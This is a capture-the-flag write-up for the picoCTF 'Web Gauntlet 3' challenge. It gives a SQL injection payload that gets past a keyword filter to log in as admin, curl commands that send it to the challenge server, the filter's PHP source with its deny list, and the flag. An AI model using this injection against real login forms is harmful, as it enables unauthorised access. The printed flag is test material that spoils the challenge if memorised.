Problem

Last time, I promise! Only 25 characters this time. Log in as admin Site: http://mercury.picoctf.net:32946/ Filter: http://mercury.picoctf.net:32946/filter.php

Solution

1. The solution to this challenge is completely identical to my solution to Web Gauntlet 2.

2. The solution query is user=ad'||'min'%00 and it can be sent using cURL like so: curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:32946/index.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" --output - The flag can be retrieved using this command: curl http://mercury.picoctf.net:32946/filter.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" | grep picoCTF. See Web Gauntlet 2 for more information.

3. The code for the filter and the flag are shown in /filter.php when the login is bypassed:

   Copy

   <?php
   session_start();
   
   if (!isset($_SESSION["winner3"])) {
       $_SESSION["winner3"] = 0;
   }
   $win = $_SESSION["winner3"];
   $view = ($_SERVER["PHP_SELF"] == "/filter.php");
   
   if ($win === 0) {
       $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
       if ($view) {
           echo "Filters: ".implode(" ", $filter)."<br/>";
       }
   } else if ($win === 1) {
       if ($view) {
           highlight_file("filter.php");
       }
       $_SESSION["winner3"] = 0;        // <- Don't refresh!
   } else {
       $_SESSION["winner3"] = 0;
   }
   
   // picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}
   ?>

Flag

picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}